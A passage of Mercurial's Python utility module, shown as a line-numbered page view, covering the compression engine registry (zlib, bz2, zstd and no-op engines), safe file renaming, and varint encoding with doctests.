3547 3547 del dirs[base]
3548 3548
3549 3549 def __iter__(self):
3550 3550 return iter(self._dirs)
3551 3551
3552 3552 def __contains__(self, d):
3553 3553 return d in self._dirs
3554 3554
3555 3555 if safehasattr(parsers, 'dirs'):
3556 3556 dirs = parsers.dirs
3557 3557
3558 3558 def finddirs(path):
3559 3559 pos = path.rfind('/')
3560 3560 while pos != -1:
3561 3561 yield path[:pos]
3562 3562 pos = path.rfind('/', 0, pos)
3563 3563
3564 3564 # compression code
3565 3565
3566 3566 SERVERROLE = 'server'
3567 3567 CLIENTROLE = 'client'
3568 3568
3569 3569 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3570 3570 (u'name', u'serverpriority',
3571 3571 u'clientpriority'))
3572 3572
3573 3573 class compressormanager(object):
3574 3574 """Holds registrations of various compression engines.
3575 3575
3576 3576 This class essentially abstracts the differences between compression
3577 3577 engines to allow new compression formats to be added easily, possibly from
3578 3578 extensions.
3579 3579
3580 3580 Compressors are registered against the global instance by calling its
3581 3581 ``register()`` method.
3582 3582 """
3583 3583 def __init__(self):
3584 3584 self._engines = {}
3585 3585 # Bundle spec human name to engine name.
3586 3586 self._bundlenames = {}
3587 3587 # Internal bundle identifier to engine name.
3588 3588 self._bundletypes = {}
3589 3589 # Revlog header to engine name.
3590 3590 self._revlogheaders = {}
3591 3591 # Wire proto identifier to engine name.
3592 3592 self._wiretypes = {}
3593 3593
3594 3594 def __getitem__(self, key):
3595 3595 return self._engines[key]
3596 3596
3597 3597 def __contains__(self, key):
3598 3598 return key in self._engines
3599 3599
3600 3600 def __iter__(self):
3601 3601 return iter(self._engines.keys())
3602 3602
3603 3603 def register(self, engine):
3604 3604 """Register a compression engine with the manager.
3605 3605
3606 3606 The argument must be a ``compressionengine`` instance.
3607 3607 """
3608 3608 if not isinstance(engine, compressionengine):
3609 3609 raise ValueError(_('argument must be a compressionengine'))
3610 3610
3611 3611 name = engine.name()
3612 3612
3613 3613 if name in self._engines:
3614 3614 raise error.Abort(_('compression engine %s already registered') %
3615 3615 name)
3616 3616
3617 3617 bundleinfo = engine.bundletype()
3618 3618 if bundleinfo:
3619 3619 bundlename, bundletype = bundleinfo
3620 3620
3621 3621 if bundlename in self._bundlenames:
3622 3622 raise error.Abort(_('bundle name %s already registered') %
3623 3623 bundlename)
3624 3624 if bundletype in self._bundletypes:
3625 3625 raise error.Abort(_('bundle type %s already registered by %s') %
3626 3626 (bundletype, self._bundletypes[bundletype]))
3627 3627
3628 3628 # No external facing name declared.
3629 3629 if bundlename:
3630 3630 self._bundlenames[bundlename] = name
3631 3631
3632 3632 self._bundletypes[bundletype] = name
3633 3633
3634 3634 wiresupport = engine.wireprotosupport()
3635 3635 if wiresupport:
3636 3636 wiretype = wiresupport.name
3637 3637 if wiretype in self._wiretypes:
3638 3638 raise error.Abort(_('wire protocol compression %s already '
3639 3639 'registered by %s') %
3640 3640 (wiretype, self._wiretypes[wiretype]))
3641 3641
3642 3642 self._wiretypes[wiretype] = name
3643 3643
3644 3644 revlogheader = engine.revlogheader()
3645 3645 if revlogheader and revlogheader in self._revlogheaders:
3646 3646 raise error.Abort(_('revlog header %s already registered by %s') %
3647 3647 (revlogheader, self._revlogheaders[revlogheader]))
3648 3648
3649 3649 if revlogheader:
3650 3650 self._revlogheaders[revlogheader] = name
3651 3651
3652 3652 self._engines[name] = engine
3653 3653
3654 3654 @property
3655 3655 def supportedbundlenames(self):
3656 3656 return set(self._bundlenames.keys())
3657 3657
3658 3658 @property
3659 3659 def supportedbundletypes(self):
3660 3660 return set(self._bundletypes.keys())
3661 3661
3662 3662 def forbundlename(self, bundlename):
3663 3663 """Obtain a compression engine registered to a bundle name.
3664 3664
3665 3665 Will raise KeyError if the bundle type isn't registered.
3666 3666
3667 3667 Will abort if the engine is known but not available.
3668 3668 """
3669 3669 engine = self._engines[self._bundlenames[bundlename]]
3670 3670 if not engine.available():
3671 3671 raise error.Abort(_('compression engine %s could not be loaded') %
3672 3672 engine.name())
3673 3673 return engine
3674 3674
3675 3675 def forbundletype(self, bundletype):
3676 3676 """Obtain a compression engine registered to a bundle type.
3677 3677
3678 3678 Will raise KeyError if the bundle type isn't registered.
3679 3679
3680 3680 Will abort if the engine is known but not available.
3681 3681 """
3682 3682 engine = self._engines[self._bundletypes[bundletype]]
3683 3683 if not engine.available():
3684 3684 raise error.Abort(_('compression engine %s could not be loaded') %
3685 3685 engine.name())
3686 3686 return engine
3687 3687
3688 3688 def supportedwireengines(self, role, onlyavailable=True):
3689 3689 """Obtain compression engines that support the wire protocol.
3690 3690
3691 3691 Returns a list of engines in prioritized order, most desired first.
3692 3692
3693 3693 If ``onlyavailable`` is set, filter out engines that can't be
3694 3694 loaded.
3695 3695 """
3696 3696 assert role in (SERVERROLE, CLIENTROLE)
3697 3697
3698 3698 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3699 3699
3700 3700 engines = [self._engines[e] for e in self._wiretypes.values()]
3701 3701 if onlyavailable:
3702 3702 engines = [e for e in engines if e.available()]
3703 3703
3704 3704 def getkey(e):
3705 3705 # Sort first by priority, highest first. In case of tie, sort
3706 3706 # alphabetically. This is arbitrary, but ensures output is
3707 3707 # stable.
3708 3708 w = e.wireprotosupport()
3709 3709 return -1 * getattr(w, attr), w.name
3710 3710
3711 3711 return list(sorted(engines, key=getkey))
3712 3712
3713 3713 def forwiretype(self, wiretype):
3714 3714 engine = self._engines[self._wiretypes[wiretype]]
3715 3715 if not engine.available():
3716 3716 raise error.Abort(_('compression engine %s could not be loaded') %
3717 3717 engine.name())
3718 3718 return engine
3719 3719
3720 3720 def forrevlogheader(self, header):
3721 3721 """Obtain a compression engine registered to a revlog header.
3722 3722
3723 3723 Will raise KeyError if the revlog header value isn't registered.
3724 3724 """
3725 3725 return self._engines[self._revlogheaders[header]]
3726 3726
3727 3727 compengines = compressormanager()
3728 3728
3729 3729 class compressionengine(object):
3730 3730 """Base class for compression engines.
3731 3731
3732 3732 Compression engines must implement the interface defined by this class.
3733 3733 """
3734 3734 def name(self):
3735 3735 """Returns the name of the compression engine.
3736 3736
3737 3737 This is the key the engine is registered under.
3738 3738
3739 3739 This method must be implemented.
3740 3740 """
3741 3741 raise NotImplementedError()
3742 3742
3743 3743 def available(self):
3744 3744 """Whether the compression engine is available.
3745 3745
3746 3746 The intent of this method is to allow optional compression engines
3747 3747 that may not be available in all installations (such as engines relying
3748 3748 on C extensions that may not be present).
3749 3749 """
3750 3750 return True
3751 3751
3752 3752 def bundletype(self):
3753 3753 """Describes bundle identifiers for this engine.
3754 3754
3755 3755 If this compression engine isn't supported for bundles, returns None.
3756 3756
3757 3757 If this engine can be used for bundles, returns a 2-tuple of strings of
3758 3758 the user-facing "bundle spec" compression name and an internal
3759 3759 identifier used to denote the compression format within bundles. To
3760 3760 exclude the name from external usage, set the first element to ``None``.
3761 3761
3762 3762 If bundle compression is supported, the class must also implement
3763 3763 ``compressstream`` and `decompressorreader``.
3764 3764
3765 3765 The docstring of this method is used in the help system to tell users
3766 3766 about this engine.
3767 3767 """
3768 3768 return None
3769 3769
3770 3770 def wireprotosupport(self):
3771 3771 """Declare support for this compression format on the wire protocol.
3772 3772
3773 3773 If this compression engine isn't supported for compressing wire
3774 3774 protocol payloads, returns None.
3775 3775
3776 3776 Otherwise, returns ``compenginewireprotosupport`` with the following
3777 3777 fields:
3778 3778
3779 3779 * String format identifier
3780 3780 * Integer priority for the server
3781 3781 * Integer priority for the client
3782 3782
3783 3783 The integer priorities are used to order the advertisement of format
3784 3784 support by server and client. The highest integer is advertised
3785 3785 first. Integers with non-positive values aren't advertised.
3786 3786
3787 3787 The priority values are somewhat arbitrary and only used for default
3788 3788 ordering. The relative order can be changed via config options.
3789 3789
3790 3790 If wire protocol compression is supported, the class must also implement
3791 3791 ``compressstream`` and ``decompressorreader``.
3792 3792 """
3793 3793 return None
3794 3794
3795 3795 def revlogheader(self):
3796 3796 """Header added to revlog chunks that identifies this engine.
3797 3797
3798 3798 If this engine can be used to compress revlogs, this method should
3799 3799 return the bytes used to identify chunks compressed with this engine.
3800 3800 Else, the method should return ``None`` to indicate it does not
3801 3801 participate in revlog compression.
3802 3802 """
3803 3803 return None
3804 3804
3805 3805 def compressstream(self, it, opts=None):
3806 3806 """Compress an iterator of chunks.
3807 3807
3808 3808 The method receives an iterator (ideally a generator) of chunks of
3809 3809 bytes to be compressed. It returns an iterator (ideally a generator)
3810 3810 of bytes of chunks representing the compressed output.
3811 3811
3812 3812 Optionally accepts an argument defining how to perform compression.
3813 3813 Each engine treats this argument differently.
3814 3814 """
3815 3815 raise NotImplementedError()
3816 3816
3817 3817 def decompressorreader(self, fh):
3818 3818 """Perform decompression on a file object.
3819 3819
3820 3820 Argument is an object with a ``read(size)`` method that returns
3821 3821 compressed data. Return value is an object with a ``read(size)`` that
3822 3822 returns uncompressed data.
3823 3823 """
3824 3824 raise NotImplementedError()
3825 3825
3826 3826 def revlogcompressor(self, opts=None):
3827 3827 """Obtain an object that can be used to compress revlog entries.
3828 3828
3829 3829 The object has a ``compress(data)`` method that compresses binary
3830 3830 data. This method returns compressed binary data or ``None`` if
3831 3831 the data could not be compressed (too small, not compressible, etc).
3832 3832 The returned data should have a header uniquely identifying this
3833 3833 compression format so decompression can be routed to this engine.
3834 3834 This header should be identified by the ``revlogheader()`` return
3835 3835 value.
3836 3836
3837 3837 The object has a ``decompress(data)`` method that decompresses
3838 3838 data. The method will only be called if ``data`` begins with
3839 3839 ``revlogheader()``. The method should return the raw, uncompressed
3840 3840 data or raise a ``RevlogError``.
3841 3841
3842 3842 The object is reusable but is not thread safe.
3843 3843 """
3844 3844 raise NotImplementedError()
3845 3845
3846 3846 class _zlibengine(compressionengine):
3847 3847 def name(self):
3848 3848 return 'zlib'
3849 3849
3850 3850 def bundletype(self):
3851 3851 """zlib compression using the DEFLATE algorithm.
3852 3852
3853 3853 All Mercurial clients should support this format. The compression
3854 3854 algorithm strikes a reasonable balance between compression ratio
3855 3855 and size.
3856 3856 """
3857 3857 return 'gzip', 'GZ'
3858 3858
3859 3859 def wireprotosupport(self):
3860 3860 return compewireprotosupport('zlib', 20, 20)
3861 3861
3862 3862 def revlogheader(self):
3863 3863 return 'x'
3864 3864
3865 3865 def compressstream(self, it, opts=None):
3866 3866 opts = opts or {}
3867 3867
3868 3868 z = zlib.compressobj(opts.get('level', -1))
3869 3869 for chunk in it:
3870 3870 data = z.compress(chunk)
3871 3871 # Not all calls to compress emit data. It is cheaper to inspect
3872 3872 # here than to feed empty chunks through generator.
3873 3873 if data:
3874 3874 yield data
3875 3875
3876 3876 yield z.flush()
3877 3877
3878 3878 def decompressorreader(self, fh):
3879 3879 def gen():
3880 3880 d = zlib.decompressobj()
3881 3881 for chunk in filechunkiter(fh):
3882 3882 while chunk:
3883 3883 # Limit output size to limit memory.
3884 3884 yield d.decompress(chunk, 2 ** 18)
3885 3885 chunk = d.unconsumed_tail
3886 3886
3887 3887 return chunkbuffer(gen())
3888 3888
3889 3889 class zlibrevlogcompressor(object):
3890 3890 def compress(self, data):
3891 3891 insize = len(data)
3892 3892 # Caller handles empty input case.
3893 3893 assert insize > 0
3894 3894
3895 3895 if insize < 44:
3896 3896 return None
3897 3897
3898 3898 elif insize <= 1000000:
3899 3899 compressed = zlib.compress(data)
3900 3900 if len(compressed) < insize:
3901 3901 return compressed
3902 3902 return None
3903 3903
3904 3904 # zlib makes an internal copy of the input buffer, doubling
3905 3905 # memory usage for large inputs. So do streaming compression
3906 3906 # on large inputs.
3907 3907 else:
3908 3908 z = zlib.compressobj()
3909 3909 parts = []
3910 3910 pos = 0
3911 3911 while pos < insize:
3912 3912 pos2 = pos + 2**20
3913 3913 parts.append(z.compress(data[pos:pos2]))
3914 3914 pos = pos2
3915 3915 parts.append(z.flush())
3916 3916
3917 3917 if sum(map(len, parts)) < insize:
3918 3918 return ''.join(parts)
3919 3919 return None
3920 3920
3921 3921 def decompress(self, data):
3922 3922 try:
3923 3923 return zlib.decompress(data)
3924 3924 except zlib.error as e:
3925 3925 raise error.RevlogError(_('revlog decompress error: %s') %
3926 3926 forcebytestr(e))
3927 3927
3928 3928 def revlogcompressor(self, opts=None):
3929 3929 return self.zlibrevlogcompressor()
3930 3930
3931 3931 compengines.register(_zlibengine())
3932 3932
3933 3933 class _bz2engine(compressionengine):
3934 3934 def name(self):
3935 3935 return 'bz2'
3936 3936
3937 3937 def bundletype(self):
3938 3938 """An algorithm that produces smaller bundles than ``gzip``.
3939 3939
3940 3940 All Mercurial clients should support this format.
3941 3941
3942 3942 This engine will likely produce smaller bundles than ``gzip`` but
3943 3943 will be significantly slower, both during compression and
3944 3944 decompression.
3945 3945
3946 3946 If available, the ``zstd`` engine can yield similar or better
3947 3947 compression at much higher speeds.
3948 3948 """
3949 3949 return 'bzip2', 'BZ'
3950 3950
3951 3951 # We declare a protocol name but don't advertise by default because
3952 3952 # it is slow.
3953 3953 def wireprotosupport(self):
3954 3954 return compewireprotosupport('bzip2', 0, 0)
3955 3955
3956 3956 def compressstream(self, it, opts=None):
3957 3957 opts = opts or {}
3958 3958 z = bz2.BZ2Compressor(opts.get('level', 9))
3959 3959 for chunk in it:
3960 3960 data = z.compress(chunk)
3961 3961 if data:
3962 3962 yield data
3963 3963
3964 3964 yield z.flush()
3965 3965
3966 3966 def decompressorreader(self, fh):
3967 3967 def gen():
3968 3968 d = bz2.BZ2Decompressor()
3969 3969 for chunk in filechunkiter(fh):
3970 3970 yield d.decompress(chunk)
3971 3971
3972 3972 return chunkbuffer(gen())
3973 3973
3974 3974 compengines.register(_bz2engine())
3975 3975
3976 3976 class _truncatedbz2engine(compressionengine):
3977 3977 def name(self):
3978 3978 return 'bz2truncated'
3979 3979
3980 3980 def bundletype(self):
3981 3981 return None, '_truncatedBZ'
3982 3982
3983 3983 # We don't implement compressstream because it is hackily handled elsewhere.
3984 3984
3985 3985 def decompressorreader(self, fh):
3986 3986 def gen():
3987 3987 # The input stream doesn't have the 'BZ' header. So add it back.
3988 3988 d = bz2.BZ2Decompressor()
3989 3989 d.decompress('BZ')
3990 3990 for chunk in filechunkiter(fh):
3991 3991 yield d.decompress(chunk)
3992 3992
3993 3993 return chunkbuffer(gen())
3994 3994
3995 3995 compengines.register(_truncatedbz2engine())
3996 3996
3997 3997 class _noopengine(compressionengine):
3998 3998 def name(self):
3999 3999 return 'none'
4000 4000
4001 4001 def bundletype(self):
4002 4002 """No compression is performed.
4003 4003
4004 4004 Use this compression engine to explicitly disable compression.
4005 4005 """
4006 4006 return 'none', 'UN'
4007 4007
4008 4008 # Clients always support uncompressed payloads. Servers don't because
4009 4009 # unless you are on a fast network, uncompressed payloads can easily
4010 4010 # saturate your network pipe.
4011 4011 def wireprotosupport(self):
4012 4012 return compewireprotosupport('none', 0, 10)
4013 4013
4014 4014 # We don't implement revlogheader because it is handled specially
4015 4015 # in the revlog class.
4016 4016
4017 4017 def compressstream(self, it, opts=None):
4018 4018 return it
4019 4019
4020 4020 def decompressorreader(self, fh):
4021 4021 return fh
4022 4022
4023 4023 class nooprevlogcompressor(object):
4024 4024 def compress(self, data):
4025 4025 return None
4026 4026
4027 4027 def revlogcompressor(self, opts=None):
4028 4028 return self.nooprevlogcompressor()
4029 4029
4030 4030 compengines.register(_noopengine())
4031 4031
4032 4032 class _zstdengine(compressionengine):
4033 4033 def name(self):
4034 4034 return 'zstd'
4035 4035
4036 4036 @propertycache
4037 4037 def _module(self):
4038 4038 # Not all installs have the zstd module available. So defer importing
4039 4039 # until first access.
4040 4040 try:
4041 4041 from . import zstd
4042 4042 # Force delayed import.
4043 4043 zstd.__version__
4044 4044 return zstd
4045 4045 except ImportError:
4046 4046 return None
4047 4047
4048 4048 def available(self):
4049 4049 return bool(self._module)
4050 4050
4051 4051 def bundletype(self):
4052 4052 """A modern compression algorithm that is fast and highly flexible.
4053 4053
4054 4054 Only supported by Mercurial 4.1 and newer clients.
4055 4055
4056 4056 With the default settings, zstd compression is both faster and yields
4057 4057 better compression than ``gzip``. It also frequently yields better
4058 4058 compression than ``bzip2`` while operating at much higher speeds.
4059 4059
4060 4060 If this engine is available and backwards compatibility is not a
4061 4061 concern, it is likely the best available engine.
4062 4062 """
4063 4063 return 'zstd', 'ZS'
4064 4064
4065 4065 def wireprotosupport(self):
4066 4066 return compewireprotosupport('zstd', 50, 50)
4067 4067
4068 4068 def revlogheader(self):
4069 4069 return '\x28'
4070 4070
4071 4071 def compressstream(self, it, opts=None):
4072 4072 opts = opts or {}
4073 4073 # zstd level 3 is almost always significantly faster than zlib
4074 4074 # while providing no worse compression. It strikes a good balance
4075 4075 # between speed and compression.
4076 4076 level = opts.get('level', 3)
4077 4077
4078 4078 zstd = self._module
4079 4079 z = zstd.ZstdCompressor(level=level).compressobj()
4080 4080 for chunk in it:
4081 4081 data = z.compress(chunk)
4082 4082 if data:
4083 4083 yield data
4084 4084
4085 4085 yield z.flush()
4086 4086
4087 4087 def decompressorreader(self, fh):
4088 4088 zstd = self._module
4089 4089 dctx = zstd.ZstdDecompressor()
4090 4090 return chunkbuffer(dctx.read_from(fh))
4091 4091
4092 4092 class zstdrevlogcompressor(object):
4093 4093 def __init__(self, zstd, level=3):
4094 4094 # Writing the content size adds a few bytes to the output. However,
4095 4095 # it allows decompression to be more optimal since we can
4096 4096 # pre-allocate a buffer to hold the result.
4097 4097 self._cctx = zstd.ZstdCompressor(level=level,
4098 4098 write_content_size=True)
4099 4099 self._dctx = zstd.ZstdDecompressor()
4100 4100 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4101 4101 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4102 4102
4103 4103 def compress(self, data):
4104 4104 insize = len(data)
4105 4105 # Caller handles empty input case.
4106 4106 assert insize > 0
4107 4107
4108 4108 if insize < 50:
4109 4109 return None
4110 4110
4111 4111 elif insize <= 1000000:
4112 4112 compressed = self._cctx.compress(data)
4113 4113 if len(compressed) < insize:
4114 4114 return compressed
4115 4115 return None
4116 4116 else:
4117 4117 z = self._cctx.compressobj()
4118 4118 chunks = []
4119 4119 pos = 0
4120 4120 while pos < insize:
4121 4121 pos2 = pos + self._compinsize
4122 4122 chunk = z.compress(data[pos:pos2])
4123 4123 if chunk:
4124 4124 chunks.append(chunk)
4125 4125 pos = pos2
4126 4126 chunks.append(z.flush())
4127 4127
4128 4128 if sum(map(len, chunks)) < insize:
4129 4129 return ''.join(chunks)
4130 4130 return None
4131 4131
4132 4132 def decompress(self, data):
4133 4133 insize = len(data)
4134 4134
4135 4135 try:
4136 4136 # This was measured to be faster than other streaming
4137 4137 # decompressors.
4138 4138 dobj = self._dctx.decompressobj()
4139 4139 chunks = []
4140 4140 pos = 0
4141 4141 while pos < insize:
4142 4142 pos2 = pos + self._decompinsize
4143 4143 chunk = dobj.decompress(data[pos:pos2])
4144 4144 if chunk:
4145 4145 chunks.append(chunk)
4146 4146 pos = pos2
4147 4147 # Frame should be exhausted, so no finish() API.
4148 4148
4149 4149 return ''.join(chunks)
4150 4150 except Exception as e:
4151 4151 raise error.RevlogError(_('revlog decompress error: %s') %
4152 4152 forcebytestr(e))
4153 4153
4154 4154 def revlogcompressor(self, opts=None):
4155 4155 opts = opts or {}
4156 4156 return self.zstdrevlogcompressor(self._module,
4157 4157 level=opts.get('level', 3))
4158 4158
4159 4159 compengines.register(_zstdengine())
4160 4160
4161 4161 def bundlecompressiontopics():
4162 4162 """Obtains a list of available bundle compressions for use in help."""
4163 4163 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
4164 4164 items = {}
4165 4165
4166 4166 # We need to format the docstring. So use a dummy object/type to hold it
4167 4167 # rather than mutating the original.
4168 4168 class docobject(object):
4169 4169 pass
4170 4170
4171 4171 for name in compengines:
4172 4172 engine = compengines[name]
4173 4173
4174 4174 if not engine.available():
4175 4175 continue
4176 4176
4177 4177 bt = engine.bundletype()
4178 4178 if not bt or not bt[0]:
4179 4179 continue
4180 4180
4181 4181 doc = pycompat.sysstr('``%s``\n %s') % (
4182 4182 bt[0], engine.bundletype.__doc__)
4183 4183
4184 4184 value = docobject()
4185 4185 value.__doc__ = doc
4186 4186 value._origdoc = engine.bundletype.__doc__
4187 4187 value._origfunc = engine.bundletype
4188 4188
4189 4189 items[bt[0]] = value
4190 4190
4191 4191 return items
4192 4192
4193 4193 i18nfunctions = bundlecompressiontopics().values()
4194 4194
4195 4195 # convenient shortcut
4196 4196 dst = debugstacktrace
4197 4197
4198 4198 def safename(f, tag, ctx, others=None):
4199 4199 """
4200 4200 Generate a name that it is safe to rename f to in the given context.
4201 4201
4202 4202 f: filename to rename
4203 4203 tag: a string tag that will be included in the new name
4204 4204 ctx: a context, in which the new name must not exist
4205 4205 others: a set of other filenames that the new name must not be in
4206 4206
4207 4207 Returns a file name of the form oldname~tag[~number] which does not exist
4208 4208 in the provided context and is not in the set of other names.
4209 4209 """
4210 4210 if others is None:
4211 4211 others = set()
4212 4212
4213 4213 fn = '%s~%s' % (f, tag)
4214 4214 if fn not in ctx and fn not in others:
4215 4215 return fn
4216 4216 for n in itertools.count(1):
4217 4217 fn = '%s~%s~%s' % (f, tag, n)
4218 4218 if fn not in ctx and fn not in others:
4219 4219 return fn
4220 4220
4221 4221 def readexactly(stream, n):
4222 4222 '''read n bytes from stream.read and abort if less was available'''
4223 4223 s = stream.read(n)
4224 4224 if len(s) < n:
4225 4225 raise error.Abort(_("stream ended unexpectedly"
4226 4226 " (got %d bytes, expected %d)")
4227 4227 % (len(s), n))
4228 4228 return s
4229 4229
4230 4230 def uvarintencode(value):
4231 4231 """Encode an unsigned integer value to a varint.
4232 4232
4233 4233 A varint is a variable length integer of 1 or more bytes. Each byte
4234 4234 except the last has the most significant bit set. The lower 7 bits of
4235 4235 each byte store the 2's complement representation, least significant group
4236 4236 first.
4237 4237
4238 4238 >>> uvarintencode(0)
4239 4239 '\\x00'
4240 4240 >>> uvarintencode(1)
4241 4241 '\\x01'
4242 4242 >>> uvarintencode(127)
4243 4243 '\\x7f'
4244 4244 >>> uvarintencode(1337)
4245 4245 '\\xb9\\n'
4246 4246 >>> uvarintencode(65536)
4247 4247 '\\x80\\x80\\x04'
4248 4248 >>> uvarintencode(-1)
4249 4249 Traceback (most recent call last):
4250 4250 ...
4251 4251 ProgrammingError: negative value for uvarint: -1
4252 4252 """
4253 4253 if value < 0:
4254 4254 raise error.ProgrammingError('negative value for uvarint: %d'
4255 4255 % value)
4256 4256 bits = value & 0x7f
4257 4257 value >>= 7
4258 4258 bytes = []
4259 4259 while value:
4260 4260 bytes.append(pycompat.bytechr(0x80 | bits))
4261 4261 bits = value & 0x7f
4262 4262 value >>= 7
4263 4263 bytes.append(pycompat.bytechr(bits))
4264 4264
4265 4265 return ''.join(bytes)
4266 4266
4267 4267 def uvarintdecodestream(fh):
4268 4268 """Decode an unsigned variable length integer from a stream.
4269 4269
4270 4270 The passed argument is anything that has a ``.read(N)`` method.
4271 4271
4272 4272 >>> try:
4273 4273 ... from StringIO import StringIO as BytesIO
4274 4274 ... except ImportError:
4275 4275 ... from io import BytesIO
4276 4276 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4277 4277 0
4278 4278 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4279 4279 1
4280 4280 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4281 4281 127
4282 4282 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4283 4283 1337
4284 4284 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4285 4285 65536
4286 4286 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4287 4287 Traceback (most recent call last):
4288 4288 ...
4289 4289 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4290 4290 """
4291 4291 result = 0
4292 4292 shift = 0
4293 4293 while True:
4294 4294 byte = ord(readexactly(fh, 1))
4295 4295 result |= ((byte & 0x7f) << shift)
4296 4296 if not (byte & 0x80):
4297 4297 return result
4298 4298 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now